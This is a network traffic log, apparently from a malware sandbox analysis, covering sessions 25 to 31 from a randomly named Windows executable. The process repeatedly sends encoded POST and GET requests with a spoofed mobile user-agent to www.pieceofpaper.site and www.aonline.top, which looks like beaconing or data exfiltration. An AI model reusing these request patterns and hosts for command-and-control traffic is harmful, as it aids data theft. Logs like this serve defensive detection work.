25	192.168.2.8	50004	142.93.62.161	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:22.813385010 CET	765	OUT	POST /0ald/ HTTP/1.1 Host: www.pieceofpaper.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.pieceofpaper.site Referer: http://www.pieceofpaper.site/0ald/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 4c 74 70 65 67 75 6c 4c 33 35 70 43 5a 59 30 61 59 59 48 42 36 79 68 63 37 52 6c 41 44 76 4e 47 48 38 2b 62 53 43 52 6a 6e 39 34 4e 37 50 62 36 67 54 52 42 64 4b 67 58 63 32 70 35 6a 45 70 54 4d 67 56 5a 69 77 37 63 48 63 56 47 4b 77 56 64 38 6e 49 47 7a 6b 46 4a 6d 79 44 34 42 54 39 69 4e 5a 7a 2f 44 45 4d 35 4d 2f 6d 71 35 51 59 56 46 4a 68 55 53 4a 35 69 42 43 2b 46 2b 67 43 75 58 32 4f 54 38 63 30 51 31 4c 46 61 45 44 56 52 52 69 31 68 6d 6d 74 76 73 39 68 76 4f 55 67 33 6b 76 4d 48 6d 34 36 45 66 62 51 2b 67 4b 6f 52 68 72 53 70 6b 42 6c 4f 64 79 79 4c 63 50 4f 45 77 33 6e 37 61 2b 51 3d Data Ascii: LH1t=LtpegulL35pCZY0aYYHB6yhc7RlADvNGH8+bSCRjn94N7Pb6gTRBdKgXc2p5jEpTMgVZiw7cHcVGKwVd8nIGzkFJmyD4BT9iNZz/DEM5M/mq5QYVFJhUSJ5iBC+F+gCuX2OT8c0Q1LFaEDVRRi1hmmtvs9hvOUg3kvMHm46EfbQ+gKoRhrSpkBlOdyyLcPOEw3n7a+Q=
Jan 10, 2025 16:42:23.291846991 CET	479	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:42:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"62c6ab1a-157" Content-Encoding: gzip Data Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	50005	142.93.62.161	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:25.360647917 CET	785	OUT	POST /0ald/ HTTP/1.1 Host: www.pieceofpaper.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.pieceofpaper.site Referer: http://www.pieceofpaper.site/0ald/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 4c 74 70 65 67 75 6c 4c 33 35 70 43 44 35 45 61 4c 6f 37 42 7a 79 68 44 34 52 6c 41 4e 50 4e 34 48 38 79 62 53 48 77 2b 6e 50 63 4e 37 75 72 36 68 53 52 42 4e 61 67 58 58 57 70 38 38 30 6f 52 4d 67 51 6b 69 77 48 63 48 64 31 47 4b 31 52 64 38 55 77 42 79 30 46 4c 71 53 44 6d 4f 7a 39 69 4e 5a 7a 2f 44 45 70 78 4d 2f 2b 71 35 68 6f 56 58 34 68 62 62 70 35 74 41 43 2b 46 6f 51 43 71 58 32 50 41 38 65 52 4c 31 49 39 61 45 42 4e 52 51 33 5a 69 78 57 74 70 69 64 67 64 50 31 5a 62 69 63 55 32 36 62 6d 35 66 34 30 5a 68 38 5a 37 37 4a 61 76 6e 42 4e 6c 64 78 61 39 5a 34 54 73 71 55 33 4c 45 70 45 75 4c 72 46 4d 41 58 61 74 31 5a 42 6e 6c 6f 65 2f 73 76 50 5a Data Ascii: LH1t=LtpegulL35pCD5EaLo7BzyhD4RlANPN4H8ybSHw+nPcN7ur6hSRBNagXXWp880oRMgQkiwHcHd1GK1Rd8UwBy0FLqSDmOz9iNZz/DEpxM/+q5hoVX4hbbp5tAC+FoQCqX2PA8eRL1I9aEBNRQ3ZixWtpidgdP1ZbicU26bm5f40Zh8Z77JavnBNldxa9Z4TsqU3LEpEuLrFMAXat1ZBnloe/svPZ
Jan 10, 2025 16:42:25.795466900 CET	479	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:42:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"62c6ab1a-157" Content-Encoding: gzip Data Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	50006	142.93.62.161	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:27.920757055 CET	1802	OUT	POST /0ald/ HTTP/1.1 Host: www.pieceofpaper.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.pieceofpaper.site Referer: http://www.pieceofpaper.site/0ald/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 4c 74 70 65 67 75 6c 4c 33 35 70 43 44 35 45 61 4c 6f 37 42 7a 79 68 44 34 52 6c 41 4e 50 4e 34 48 38 79 62 53 48 77 2b 6e 50 55 4e 37 64 7a 36 67 78 4a 42 4f 61 67 58 65 32 70 39 38 30 6f 51 4d 67 6f 67 69 77 4b 6e 48 59 78 47 4c 58 5a 64 36 6c 77 42 34 30 46 4c 33 69 44 37 42 54 39 33 4e 5a 6a 7a 44 45 5a 78 4d 2f 2b 71 35 69 77 56 55 70 68 62 64 70 35 69 42 43 2b 5a 2b 67 43 43 58 32 57 31 38 65 56 62 31 5a 64 61 46 69 31 52 54 42 74 69 7a 32 74 72 79 4e 67 46 50 30 6c 45 69 63 59 79 36 59 36 58 66 34 4d 5a 68 36 78 68 6d 70 6d 46 35 7a 68 35 51 6a 72 65 52 2f 72 30 67 30 36 78 4c 34 30 53 44 2b 74 36 46 6e 57 37 79 4c 52 76 68 76 57 66 6d 59 57 5a 4a 55 6e 6a 41 6d 47 47 2b 47 52 67 79 54 72 67 43 75 44 51 4f 6e 77 4c 4a 31 67 74 6f 31 4c 6c 4b 52 70 5a 64 4b 49 66 61 39 50 51 32 59 42 46 51 49 6c 52 6d 4c 57 65 73 6a 37 66 47 78 71 6a 6c 5a 78 32 4b 71 7a 34 46 44 69 31 46 6d 50 73 52 52 64 4b 61 62 33 44 2f 2f 56 7a 2b 68 39 48 76 79 35 48 52 66 4c 4a 63 75 54 35 35 76 56 62 66 [TRUNCATED] Data Ascii: LH1t=LtpegulL35pCD5EaLo7BzyhD4RlANPN4H8ybSHw+nPUN7dz6gxJBOagXe2p980oQMgogiwKnHYxGLXZd6lwB40FL3iD7BT93NZjzDEZxM/+q5iwVUphbdp5iBC+Z+gCCX2W18eVb1ZdaFi1RTBtiz2tryNgFP0lEicYy6Y6Xf4MZh6xhmpmF5zh5QjreR/r0g06xL40SD+t6FnW7yLRvhvWfmYWZJUnjAmGG+GRgyTrgCuDQOnwLJ1gto1LlKRpZdKIfa9PQ2YBFQIlRmLWesj7fGxqjlZx2Kqz4FDi1FmPsRRdKab3D//Vz+h9Hvy5HRfLJcuT55vVbfgIlnC4GY8QkIzqJlpiqdnBZPTTiRBwYDq8upnhAbUd1sCTSafEE8Tq6ZKpFT/iEFhzlkKga2dUsnUc4ve1+4CeX7ortkdNWJIfN/NSIhYl+P6DTzWgH+N2xfN6RmYGALTE9tahIfWYTtuUYbNb0bSc/8Vzei7OBeGYckS8cTREUcpzUHjPG8JU2GTfWfdVW6ioN2cxtNhyqdMw++LJ5fKkO6mKvyWsdj8hVJNrzsVhw1Te8mztKkMKKK46iEFhYtufLNNdL/1HU40zIQmpAYQH4b2aSJ57BWPYtB+LSjPbPCk9KEynz5j2JA1VW/oqhBf0zd7eYHYhwkl059BNcI4crVAn9V9mBz6P/zjRJCklwUvoAYg0aQ5MaaYm1giMVHrjj1o61HQOw4A1hlpGoWtUH3wrsWW0szJqUXGPapHWELgl0/tAORJHzOuLvw44UGgbEbykKk94tHihfbmPKD3uv4Eas0Epxp7B4CycFBjsDxqNK24/dE8RBrZ2edfhaHZjziQu73l9SbYAJXweUYZXFXqpF5jZ6RNN93hTndN80dglqrNuYQnakAPGCYIxVkKf0/ZT/q0bkbagRoNVEo3ZvwxFqx+kMRNCjTrxakVC12Nyg49/YAfwnx0X5JM/zesoCBZqKOx8Qxiugx6QayC9zugLa+c/JLxd [TRUNCATED]
Jan 10, 2025 16:42:28.374538898 CET	479	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:42:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"62c6ab1a-157" Content-Encoding: gzip Data Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 50 bb 4e c4 30 10 ec f9 0a 63 89 d2 71 4e 74 79 5c 73 50 43 41 43 85 1c 67 13 5b b2 bd 96 bd 21 17 be 9e 73 c2 55 6c b3 33 a3 dd 19 69 ba c7 97 b7 cb c7 e7 fb 2b 33 e4 dd f9 a1 3b 16 bb 4d 67 a7 a4 3c b0 9c 74 cf 0d 51 cc 8d 94 da e1 32 ae 6a cb 22 93 22 ab 85 c6 40 10 a8 ca cf d5 92 05 a8 4c e2 54 29 af 7e 30 a8 35 57 1a bd 84 94 30 7d 45 35 83 f4 ca 96 73 15 34 88 11 0b 13 5e c5 68 c3 5c 95 60 ce f6 c8 01 d3 08 a9 e7 35 67 99 36 07 3d c7 6f 48 93 c3 b5 31 76 1c 21 b4 77 2e ae ff 94 ed ae 18 b0 b3 a1 e6 54 d7 4f ed 6a 47 32 07 8c 98 2d 59 0c 8d 1a 32 ba 85 a0 25 8c 4d 1d af ad 83 89 76 90 f6 c7 82 06 24 42 5f 20 67 87 5f cf 8b 0b 67 bb e3 1f 39 77 f2 e8 ea d6 9f dc 0b fc 05 66 f7 1e 64 57 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7ePN0cqNty\sPCACg[!sUl3i+3;Mg<tQ2j""@LT)~05W0}E5s4^h\`5g6=oH1v!w.TOjG2-Y2%Mv$B_ g_g9wfdW0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	50007	142.93.62.161	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:30.470752954 CET	506	OUT	GET /0ald/?LH1t=GvB+jYFK7sUEVqFEMuDG3C1X5D5RIs4zAP2rS1xhhNwzzZ6rrVY3WKggPmhykWotN1cmggGZQp5xPXoK3iAW/XAR3z3aIgZ3aLv5KCsbCaCc5hAzYI14dJhMOAu101TFNw==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.pieceofpaper.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:42:30.903091908 CET	188	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:42:30 GMT Content-Type: text/html Content-Length: 343 Connection: close Vary: Accept-Encoding ETag: "62c6ab1a-157"
Jan 10, 2025 16:42:30.903109074 CET	343	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 77 61 79 73 2d 73 74 61 74 69 63 2d 63 6f 6e 74 65 6e 74 2e 73 33 2e 75 73 2d 65 61 73 Data Ascii: <!DOCTYPE html><html> <iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	50008	104.21.96.1	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:36.469980001 CET	747	OUT	POST /fqlg/ HTTP/1.1 Host: www.aonline.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.aonline.top Referer: http://www.aonline.top/fqlg/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 68 53 4e 5a 79 72 4b 53 6b 78 46 31 6b 43 66 54 46 4e 4a 45 51 49 71 74 56 61 66 6e 53 79 58 32 66 51 41 56 65 32 35 35 61 51 71 53 45 45 6e 63 6c 69 4c 76 6a 2b 6e 76 70 49 33 36 70 2f 59 50 72 69 76 34 49 79 70 32 57 52 6e 6d 58 32 4d 36 65 58 43 64 34 56 38 67 57 6d 6a 42 50 33 38 42 49 46 41 69 48 67 68 41 35 57 70 41 30 45 4f 4d 70 77 38 73 36 55 67 65 6b 72 51 63 39 38 6a 47 4b 4d 7a 52 46 6d 45 51 4c 7a 45 56 4e 69 74 32 66 5a 4e 66 63 72 6e 4d 71 50 48 72 76 4f 7a 50 39 47 68 31 66 6d 35 39 64 66 58 2f 4d 71 70 2f 72 4f 53 75 64 46 4b 2f 30 53 56 6c 36 45 41 69 6f 7a 4e 68 65 62 67 3d Data Ascii: LH1t=hSNZyrKSkxF1kCfTFNJEQIqtVafnSyX2fQAVe255aQqSEEncliLvj+nvpI36p/YPriv4Iyp2WRnmX2M6eXCd4V8gWmjBP38BIFAiHghA5WpA0EOMpw8s6UgekrQc98jGKMzRFmEQLzEVNit2fZNfcrnMqPHrvOzP9Gh1fm59dfX/Mqp/rOSudFK/0SVl6EAiozNhebg=
Jan 10, 2025 16:42:37.077045918 CET	917	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RiDMbD0ppASrrKLqjHNew%2FfGsg2vWc%2FWk24d%2FBKDTWHDlhcA9RtJeEOW5tjdYrhhUij0w5gAdYBopfDaxWlnQl3QEVh9xL2daZxpCHnBPaItz9I2OxyIhVhPecr9b6EuRm8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc7287b3ec32e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1611&rtt_var=805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	50009	104.21.96.1	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:39.013355970 CET	767	OUT	POST /fqlg/ HTTP/1.1 Host: www.aonline.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.aonline.top Referer: http://www.aonline.top/fqlg/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 68 53 4e 5a 79 72 4b 53 6b 78 46 31 6e 68 33 54 43 75 52 45 42 6f 71 71 51 61 66 6e 64 53 58 79 66 51 4d 56 65 33 39 54 61 69 4f 53 45 6d 2f 63 6b 6e 2f 76 67 2b 6e 76 6e 6f 33 2f 6d 66 5a 44 72 69 54 77 49 78 78 32 57 52 7a 6d 58 30 55 36 65 42 4b 63 35 46 38 6d 64 47 6a 44 52 48 38 42 49 46 41 69 48 67 46 71 35 53 46 41 30 30 2b 4d 6f 52 39 65 6c 6b 67 66 74 4c 51 63 35 38 6a 43 4b 4d 7a 6a 46 6e 59 36 4c 78 4d 56 4e 69 39 32 47 73 35 59 53 62 6e 47 75 50 47 6c 2b 66 61 47 31 33 68 41 53 52 45 54 61 65 4c 41 4e 63 59 56 78 73 61 6f 65 46 69 55 30 52 39 54 2f 7a 64 4b 79 51 64 52 41 4d 33 73 62 6e 49 36 4d 6f 6f 75 56 41 52 4b 71 6d 7a 62 54 71 4d 6c Data Ascii: LH1t=hSNZyrKSkxF1nh3TCuREBoqqQafndSXyfQMVe39TaiOSEm/ckn/vg+nvno3/mfZDriTwIxx2WRzmX0U6eBKc5F8mdGjDRH8BIFAiHgFq5SFA00+MoR9elkgftLQc58jCKMzjFnY6LxMVNi92Gs5YSbnGuPGl+faG13hASRETaeLANcYVxsaoeFiU0R9T/zdKyQdRAM3sbnI6MoouVARKqmzbTqMl
Jan 10, 2025 16:42:39.617222071 CET	914	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JePrF%2Bi68Rhgjh%2F9wuhTbLw6EKwBkWXcd3r%2FZ9AFvcTcFmDKzR15juXip8iLGXnCpv6gr%2FN6dB7LwP2fyTTIhj2z0mV8bPUcpbwUoWqBLCQKNAEQJRCnx7lpqmzfvggTn7k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc7386eda4363-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=767&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	50010	104.21.96.1	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:41.568582058 CET	1784	OUT	POST /fqlg/ HTTP/1.1 Host: www.aonline.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.aonline.top Referer: http://www.aonline.top/fqlg/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 68 53 4e 5a 79 72 4b 53 6b 78 46 31 6e 68 33 54 43 75 52 45 42 6f 71 71 51 61 66 6e 64 53 58 79 66 51 4d 56 65 33 39 54 61 69 47 53 46 54 6a 63 6b 41 6a 76 68 2b 6e 76 76 49 33 2b 6d 66 5a 4f 72 69 4c 30 49 32 35 49 57 53 4c 6d 58 58 63 36 4b 6b 71 63 67 31 38 6d 53 6d 6a 47 50 33 39 62 49 46 52 6c 48 67 31 71 35 53 46 41 30 33 6d 4d 76 41 39 65 2b 6b 67 65 6b 72 51 71 39 38 6a 6d 4b 4d 72 4a 46 6e 63 41 4c 43 55 56 4e 47 68 32 45 36 6c 59 55 4c 6e 41 70 50 48 34 2b 66 47 46 31 33 39 45 53 55 52 49 61 66 2f 41 42 62 74 78 74 2b 71 72 4b 46 47 51 74 67 39 58 6d 53 64 62 33 52 5a 53 41 73 54 6b 50 69 55 6c 4b 65 6f 6c 43 52 38 5a 6f 54 50 62 63 4f 64 75 62 69 6e 4a 30 46 44 47 7a 42 57 4a 77 61 6a 55 6d 36 72 6d 64 35 56 32 63 35 33 79 4c 6a 31 46 50 76 76 56 62 6f 33 46 57 65 4b 4d 2f 6e 68 35 61 6b 57 37 51 72 65 7a 5a 68 43 42 53 57 64 6d 39 77 32 79 66 37 34 72 5a 64 2f 71 6d 6e 42 2b 6a 71 42 68 57 73 66 6c 48 63 2f 35 55 4e 6c 59 71 76 53 4a 34 6c 6c 58 7a 4f 2f 54 4d 32 67 65 44 [TRUNCATED] Data Ascii: LH1t=hSNZyrKSkxF1nh3TCuREBoqqQafndSXyfQMVe39TaiGSFTjckAjvh+nvvI3+mfZOriL0I25IWSLmXXc6Kkqcg18mSmjGP39bIFRlHg1q5SFA03mMvA9e+kgekrQq98jmKMrJFncALCUVNGh2E6lYULnApPH4+fGF139ESURIaf/ABbtxt+qrKFGQtg9XmSdb3RZSAsTkPiUlKeolCR8ZoTPbcOdubinJ0FDGzBWJwajUm6rmd5V2c53yLj1FPvvVbo3FWeKM/nh5akW7QrezZhCBSWdm9w2yf74rZd/qmnB+jqBhWsflHc/5UNlYqvSJ4llXzO/TM2geDLbKmB36dc5SciAL6RpOfiIsS1Pf8RKsNIhHdQLkaJVHuoWJq1wpbilBx+lxW365tDGszxyHwDRFOnmwiU9LZ4yTzFtQgtgvkSyewbqWH15lODVuf5VGftBlkXPEnuLgcQ1vH4Mdm8DcBZ2ZfFZNzWTd8eRwv3y2pKy0SzhHc/Lfzzkw9e18RYIEIPNX8bDydKR5ABGNQvZXXIY89s7/W0qO7rJqqdX3vPExcI9Aig5XogSShIdIhaE4TAUg7DAixC6JoTnYwfy0dodzvRJ+LtBpEz2trQWtGGvxNzL+8Z773wfXWGg5drYNx0/AoiTd0+l4Y1U06nq8HZwSSKkiA/CFH2frzh/FqIU6F5AKjY6MJ3a+sQNoYgpcNoW/PHaghNmC+drbqupIsiofV2/XLLmqqvvqtuVySS1OKDqkaFmF40KcnBCjTvjW3G52kWcMLzLO105Cr/5c9+68tDfyP01Grim+utVebkFepzxlmkXa5CKO1ziKGEC2cesV3mzMhyhaE5+S3Sn8m2jULGjsJa5J2f+0WOwLKbRdOk92i/tJseMkFm83zf3VPJ67ZrUE0xZvwSLNfAhKgoT+7hxwogSGMiC81Trf+lUXSQeUJA30gLIArIbR8PkPUH7bnJ3z2LgW3xTv9V4y9T0H/3KWnxTtk7G4YOu9Brt [TRUNCATED]
